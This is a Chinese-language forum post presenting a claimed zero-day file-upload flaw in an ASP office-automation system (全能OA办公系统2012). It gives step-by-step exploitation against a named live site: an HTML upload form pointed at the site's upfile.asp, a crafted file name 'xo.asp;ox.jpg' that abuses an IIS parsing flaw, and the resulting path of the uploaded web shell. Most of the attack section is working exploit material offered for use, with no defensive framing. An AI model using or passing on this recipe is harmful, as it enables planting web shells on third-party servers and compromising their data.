全能OA办公系统0day OA办公系统漏洞 上传漏洞
全能OA办公系统 上传漏洞
系统介绍:
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
主要功能:
公司通告
工作计划
通讯助理
客户资源
我的公文
公文传阅
公共资源
资源预约
今日考勤
个人计划
个人通讯录
个人基本档案
未读邮件
发邮件
收件夹
寄件夹
网络硬盘
网络会议
网络调查
交流论坛
有兴趣测试的朋友可以下源码看看
源码下载:
http://www.mycodes.net/30/4750.htm
漏洞介绍:
由upfile.asp上传文件漏洞引起
测试方法:
使用名小子上传http://www.itlynn.com/upfile.asp即可
如果upfile.asp文件被删除不存在。
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
如果存在那么将如下代码保存为upfile.html。
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
01 <table border='0' align="center" cellpadding="5">
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
03 <tr>
04 <td>报错:</td>
05 <td><input type='radio' name='errnumber' value='0'>
06 自动更名
07 <input type='radio' name='errnumber' value='1' checked>
08 报错方式
09 <input type='radio' name='errnumber' value='2'>
10 直接覆盖</td>
11 </tr>
12 <tr>
13 <td>主题:</td>
14 <td><input type='text' name='filename' size='30'></td>
15 </tr>
16 <tr>
17 <td>文件:</td>
18 <td><input type="file"name="fruit"size="30"></td>
19 </tr>
20 <tr>
21 <td valign='top'>简介:</td>
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
23 </tr>
24
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
26 </tr>
27 </form>
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
此漏洞需要配合解析漏洞利用。
页:
[1]